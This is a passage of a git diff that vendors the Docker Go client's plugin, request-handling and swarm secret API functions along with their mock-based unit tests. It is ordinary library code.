+	resp, err := cli.get(ctx, "/plugins", nil, nil)
+	if err != nil {
+		return plugins, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&plugins)
+	ensureReaderClosed(resp)
+	return plugins, err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go
new file mode 100644
index 0000000000..173e4b87f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_list_test.go
@@ -0,0 +1,59 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestPluginListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.PluginList(context.Background())
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginList(t *testing.T) {
+	expectedURL := "/plugins"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal([]*types.Plugin{
+				{
+					ID: "plugin_id1",
+				},
+				{
+					ID: "plugin_id2",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	plugins, err := client.PluginList(context.Background())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(plugins) != 2 {
+		t.Fatalf("expected 2 plugins, got %v", plugins)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go
new file mode 100644
index 0000000000..1e5f963251
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_push.go
@@ -0,0 +1,17 @@
+package client
+
+import (
+	"io"
+
+	"golang.org/x/net/context"
+)
+
+// PluginPush pushes a plugin to a registry
+func (cli *Client) PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	resp, err := cli.post(ctx, "/plugins/"+name+"/push", nil, nil, headers)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go
new file mode 100644
index 0000000000..d9f70cdff8
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_push_test.go
@@ -0,0 +1,51 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestPluginPushError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.PluginPush(context.Background(), "plugin_name", "")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginPush(t *testing.T) {
+	expectedURL := "/plugins/plugin_name"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			auth := req.Header.Get("X-Registry-Auth")
+			if auth != "authtoken" {
+				return nil, fmt.Errorf("Invalid auth header : expected 'authtoken', got %s", auth)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	_, err := client.PluginPush(context.Background(), "plugin_name", "authtoken")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go
new file mode 100644
index 0000000000..b017e4d348
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_remove.go
@@ -0,0 +1,20 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginRemove removes a plugin
+func (cli *Client) PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error {
+	query := url.Values{}
+	if options.Force {
+		query.Set("force", "1")
+	}
+
+	resp, err := cli.delete(ctx, "/plugins/"+name, query, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go
new file mode 100644
index 0000000000..a15f1661f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go
@@ -0,0 +1,49 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+
+	"golang.org/x/net/context"
+)
+
+func TestPluginRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginRemove(t *testing.T) {
+	expectedURL := "/plugins/plugin_name"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.PluginRemove(context.Background(), "plugin_name", types.PluginRemoveOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_set.go b/vendor/github.com/docker/docker/client/plugin_set.go
new file mode 100644
index 0000000000..3260d2a90d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_set.go
@@ -0,0 +1,12 @@
+package client
+
+import (
+	"golang.org/x/net/context"
+)
+
+// PluginSet modifies settings for an existing plugin
+func (cli *Client) PluginSet(ctx context.Context, name string, args []string) error {
+	resp, err := cli.post(ctx, "/plugins/"+name+"/set", nil, args, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go
new file mode 100644
index 0000000000..2450254463
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_set_test.go
@@ -0,0 +1,47 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestPluginSetError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.PluginSet(context.Background(), "plugin_name", []string{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginSet(t *testing.T) {
+	expectedURL := "/plugins/plugin_name/set"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.PluginSet(context.Background(), "plugin_name", []string{"arg1"})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go
new file mode 100644
index 0000000000..95a4356b97
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go
@@ -0,0 +1,37 @@
+package client
+
+import (
+	"fmt"
+	"io"
+	"net/url"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+// PluginUpgrade upgrades a plugin
+func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) {
+	query := url.Values{}
+	if _, err := reference.ParseNamed(options.RemoteRef); err != nil {
+		return nil, errors.Wrap(err, "invalid remote reference")
+	}
+	query.Set("remote", options.RemoteRef)
+
+	privileges, err := cli.checkPluginPermissions(ctx, query, options)
+	if err != nil {
+		return nil, err
+	}
+
+	resp, err := cli.tryPluginUpgrade(ctx, query, privileges, name, options.RegistryAuth)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
+
+func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers)
+}
diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go
new file mode 100644
index 0000000000..ac05363655
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/request.go
@@ -0,0 +1,247 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+	"golang.org/x/net/context/ctxhttp"
+)
+
+// serverResponse is a wrapper for http API responses.
+type serverResponse struct {
+	body       io.ReadCloser
+	header     http.Header
+	statusCode int
+}
+
+// head sends an http request to the docker API using the method HEAD.
+func (cli *Client) head(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) {
+	return cli.sendRequest(ctx, "HEAD", path, query, nil, headers)
+}
+
+// getWithContext sends an http request to the docker API using the method GET with a specific go context.
+func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) {
+	return cli.sendRequest(ctx, "GET", path, query, nil, headers)
+}
+
+// postWithContext sends an http request to the docker API using the method POST with a specific go context.
+func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) {
+	body, headers, err := encodeBody(obj, headers)
+	if err != nil {
+		return serverResponse{}, err
+	}
+	return cli.sendRequest(ctx, "POST", path, query, body, headers)
+}
+
+func (cli *Client) postRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) {
+	return cli.sendRequest(ctx, "POST", path, query, body, headers)
+}
+
+// put sends an http request to the docker API using the method PUT.
+func (cli *Client) put(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) {
+	body, headers, err := encodeBody(obj, headers)
+	if err != nil {
+		return serverResponse{}, err
+	}
+	return cli.sendRequest(ctx, "PUT", path, query, body, headers)
+}
+
+// put sends an http request to the docker API using the method PUT.
+func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) {
+	return cli.sendRequest(ctx, "PUT", path, query, body, headers)
+}
+
+// delete sends an http request to the docker API using the method DELETE.
+func (cli *Client) delete(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) {
+	return cli.sendRequest(ctx, "DELETE", path, query, nil, headers)
+}
+
+type headers map[string][]string
+
+func encodeBody(obj interface{}, headers headers) (io.Reader, headers, error) {
+	if obj == nil {
+		return nil, headers, nil
+	}
+
+	body, err := encodeData(obj)
+	if err != nil {
+		return nil, headers, err
+	}
+	if headers == nil {
+		headers = make(map[string][]string)
+	}
+	headers["Content-Type"] = []string{"application/json"}
+	return body, headers, nil
+}
+
+func (cli *Client) buildRequest(method, path string, body io.Reader, headers headers) (*http.Request, error) {
+	expectedPayload := (method == "POST" || method == "PUT")
+	if expectedPayload && body == nil {
+		body = bytes.NewReader([]byte{})
+	}
+
+	req, err := http.NewRequest(method, path, body)
+	if err != nil {
+		return nil, err
+	}
+	req = cli.addHeaders(req, headers)
+
+	if cli.proto == "unix" || cli.proto == "npipe" {
+		// For local communications, it doesn't matter what the host is. We just
+		// need a valid and meaningful host name. (See #189)
+		req.Host = "docker"
+	}
+
+	req.URL.Host = cli.addr
+	req.URL.Scheme = cli.scheme
+
+	if expectedPayload && req.Header.Get("Content-Type") == "" {
+		req.Header.Set("Content-Type", "text/plain")
+	}
+	return req, nil
+}
+
+func (cli *Client) sendRequest(ctx context.Context, method, path string, query url.Values, body io.Reader, headers headers) (serverResponse, error) {
+	req, err := cli.buildRequest(method, cli.getAPIPath(path, query), body, headers)
+	if err != nil {
+		return serverResponse{}, err
+	}
+	return cli.doRequest(ctx, req)
+}
+
+func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) {
+	serverResp := serverResponse{statusCode: -1}
+
+	resp, err := ctxhttp.Do(ctx, cli.client, req)
+	if err != nil {
+		if cli.scheme != "https" && strings.Contains(err.Error(), "malformed HTTP response") {
+			return serverResp, fmt.Errorf("%v.\n* Are you trying to connect to a TLS-enabled daemon without TLS?", err)
+		}
+
+		if cli.scheme == "https" && strings.Contains(err.Error(), "bad certificate") {
+			return serverResp, fmt.Errorf("The server probably has client authentication (--tlsverify) enabled. Please check your TLS client certification settings: %v", err)
+		}
+
+		// Don't decorate context sentinel errors; users may be comparing to
+		// them directly.
+		switch err {
+		case context.Canceled, context.DeadlineExceeded:
+			return serverResp, err
+		}
+
+		if nErr, ok := err.(*url.Error); ok {
+			if nErr, ok := nErr.Err.(*net.OpError); ok {
+				if os.IsPermission(nErr.Err) {
+					return serverResp, errors.Wrapf(err, "Got permission denied while trying to connect to the Docker daemon socket at %v", cli.host)
+				}
+			}
+		}
+
+		if err, ok := err.(net.Error); ok {
+			if err.Timeout() {
+				return serverResp, ErrorConnectionFailed(cli.host)
+			}
+			if !err.Temporary() {
+				if strings.Contains(err.Error(), "connection refused") || strings.Contains(err.Error(), "dial unix") {
+					return serverResp, ErrorConnectionFailed(cli.host)
+				}
+			}
+		}
+
+		// Although there's not a strongly typed error for this in go-winio,
+		// lots of people are using the default configuration for the docker
+		// daemon on Windows where the daemon is listening on a named pipe
+		// `//./pipe/docker_engine, and the client must be running elevated.
+		// Give users a clue rather than the not-overly useful message
+		// such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info:
+		// open //./pipe/docker_engine: The system cannot find the file specified.`.
+		// Note we can't string compare "The system cannot find the file specified" as
+		// this is localised - for example in French the error would be
+		// `open //./pipe/docker_engine: Le fichier spécifié est introuvable.`
+		if strings.Contains(err.Error(), `open //./pipe/docker_engine`) {
+			err = errors.New(err.Error() + " In the default daemon configuration on Windows, the docker client must be run elevated to connect. This error may also indicate that the docker daemon is not running.")
+		}
+
+		return serverResp, errors.Wrap(err, "error during connect")
+	}
+
+	if resp != nil {
+		serverResp.statusCode = resp.StatusCode
+	}
+
+	if serverResp.statusCode < 200 || serverResp.statusCode >= 400 {
+		body, err := ioutil.ReadAll(resp.Body)
+		if err != nil {
+			return serverResp, err
+		}
+		if len(body) == 0 {
+			return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL)
+		}
+
+		var errorMessage string
+		if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) &&
+			resp.Header.Get("Content-Type") == "application/json" {
+			var errorResponse types.ErrorResponse
+			if err := json.Unmarshal(body, &errorResponse); err != nil {
+				return serverResp, fmt.Errorf("Error reading JSON: %v", err)
+			}
+			errorMessage = errorResponse.Message
+		} else {
+			errorMessage = string(body)
+		}
+
+		return serverResp, fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage))
+	}
+
+	serverResp.body = resp.Body
+	serverResp.header = resp.Header
+	return serverResp, nil
+}
+
+func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request {
+	// Add CLI Config's HTTP Headers BEFORE we set the Docker headers
+	// then the user can't change OUR headers
+	for k, v := range cli.customHTTPHeaders {
+		if versions.LessThan(cli.version, "1.25") && k == "User-Agent" {
+			continue
+		}
+		req.Header.Set(k, v)
+	}
+
+	if headers != nil {
+		for k, v := range headers {
+			req.Header[k] = v
+		}
+	}
+	return req
+}
+
+func encodeData(data interface{}) (*bytes.Buffer, error) {
+	params := bytes.NewBuffer(nil)
+	if data != nil {
+		if err := json.NewEncoder(params).Encode(data); err != nil {
+			return nil, err
+		}
+	}
+	return params, nil
+}
+
+func ensureReaderClosed(response serverResponse) {
+	if body := response.body; body != nil {
+		// Drain up to 512 bytes and close the body to let the Transport reuse the connection
+		io.CopyN(ioutil.Discard, body, 512)
+		response.body.Close()
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go
new file mode 100644
index 0000000000..63908aec4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/request_test.go
@@ -0,0 +1,92 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// TestSetHostHeader should set fake host for local communications, set real host
+// for normal communications.
+func TestSetHostHeader(t *testing.T) {
+	testURL := "/test"
+	testCases := []struct {
+		host            string
+		expectedHost    string
+		expectedURLHost string
+	}{
+		{
+			"unix:///var/run/docker.sock",
+			"docker",
+			"/var/run/docker.sock",
+		},
+		{
+			"npipe:////./pipe/docker_engine",
+			"docker",
+			"//./pipe/docker_engine",
+		},
+		{
+			"tcp://0.0.0.0:4243",
+			"",
+			"0.0.0.0:4243",
+		},
+		{
+			"tcp://localhost:4243",
+			"",
+			"localhost:4243",
+		},
+	}
+
+	for c, test := range testCases {
+		proto, addr, basePath, err := ParseHost(test.host)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, testURL) {
+					return nil, fmt.Errorf("Test Case #%d: Expected URL %q, got %q", c, testURL, req.URL)
+				}
+				if req.Host != test.expectedHost {
+					return nil, fmt.Errorf("Test Case #%d: Expected host %q, got %q", c, test.expectedHost, req.Host)
+				}
+				if req.URL.Host != test.expectedURLHost {
+					return nil, fmt.Errorf("Test Case #%d: Expected URL host %q, got %q", c, test.expectedURLHost, req.URL.Host)
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(([]byte("")))),
+				}, nil
+			}),
+
+			proto:    proto,
+			addr:     addr,
+			basePath: basePath,
+		}
+
+		_, err = client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil)
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+}
+
+// TestPlainTextError tests the server returning an error in plain text for
+// backwards compatibility with API versions <1.24. All other tests use
+// errors returned as JSON
+func TestPlainTextError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(plainTextErrorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerList(context.Background(), types.ContainerListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go
new file mode 100644
index 0000000000..de8b041567
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_create.go
@@ -0,0 +1,24 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SecretCreate creates a new Secret.
+func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) {
+	var headers map[string][]string
+
+	var response types.SecretCreateResponse
+	resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go
new file mode 100644
index 0000000000..cb378c77ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_create_test.go
@@ -0,0 +1,57 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestSecretCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.SecretCreate(context.Background(), swarm.SecretSpec{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSecretCreate(t *testing.T) {
+	expectedURL := "/secrets/create"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			b, err := json.Marshal(types.SecretCreateResponse{
+				ID: "test_secret",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusCreated,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.SecretCreate(context.Background(), swarm.SecretSpec{})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "test_secret" {
+		t.Fatalf("expected `test_secret`, got %s", r.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go
new file mode 100644
index 0000000000..f774576118
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_inspect.go
@@ -0,0 +1,34 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SecretInspectWithRaw returns the secret information with raw data
+func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) {
+	resp, err := cli.get(ctx, "/secrets/"+id, nil, nil)
+	if err != nil {
+		if resp.statusCode == http.StatusNotFound {
+			return swarm.Secret{}, nil, secretNotFoundError{id}
+		}
+		return swarm.Secret{}, nil, err
+	}
+	defer ensureReaderClosed(resp)
+
+	body, err := ioutil.ReadAll(resp.body)
+	if err != nil {
+		return swarm.Secret{}, nil, err
+	}
+
+	var secret swarm.Secret
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&secret)
+
+	return secret, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go
new file mode 100644
index 0000000000..423d986968
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go
@@ -0,0 +1,65 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestSecretInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.SecretInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSecretInspectSecretNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.SecretInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrSecretNotFound(err) {
+		t.Fatalf("expected an secretNotFoundError error, got %v", err)
+	}
+}
+
+func TestSecretInspect(t *testing.T) {
+	expectedURL := "/secrets/secret_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Secret{
+				ID: "secret_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	secretInspect, _, err := client.SecretInspectWithRaw(context.Background(), "secret_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if secretInspect.ID != "secret_id" {
+		t.Fatalf("expected `secret_id`, got %s", secretInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go
new file mode 100644
index 0000000000..7e9d5ec167
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_list.go
@@ -0,0 +1,35 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SecretList returns the list of secrets.
+func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) {
+	query := url.Values{}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParam(options.Filters)
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/secrets", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var secrets []swarm.Secret
+	err = json.NewDecoder(resp.body).Decode(&secrets)
+	ensureReaderClosed(resp)
+	return secrets, err
+}
diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go
new file mode 100644
index 0000000000..1ac11cddb3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_list_test.go
@@ -0,0 +1,94 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestSecretListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.SecretList(context.Background(), types.SecretListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSecretList(t *testing.T) {
+	expectedURL := "/secrets"
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+
+	listCases := []struct {
+		options             types.SecretListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.SecretListOptions{},
+			expectedQueryParams: map[string]string{
+				"filters": "",
+			},
+		},
+		{
+			options: types.SecretListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": `{"label":{"label1":true,"label2":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]swarm.Secret{
+					{
+						ID: "secret_id1",
+					},
+					{
+						ID: "secret_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		secrets, err := client.SecretList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(secrets) != 2 {
+			t.Fatalf("expected 2 secrets, got %v", secrets)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go
new file mode 100644
index 0000000000..1955b988a9
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_remove.go
@@ -0,0 +1,10 @@
+package client
+
+import "golang.org/x/net/context"
+
+// SecretRemove removes a Secret.
+func (cli *Client) SecretRemove(ctx context.Context, id string) error {
+	resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
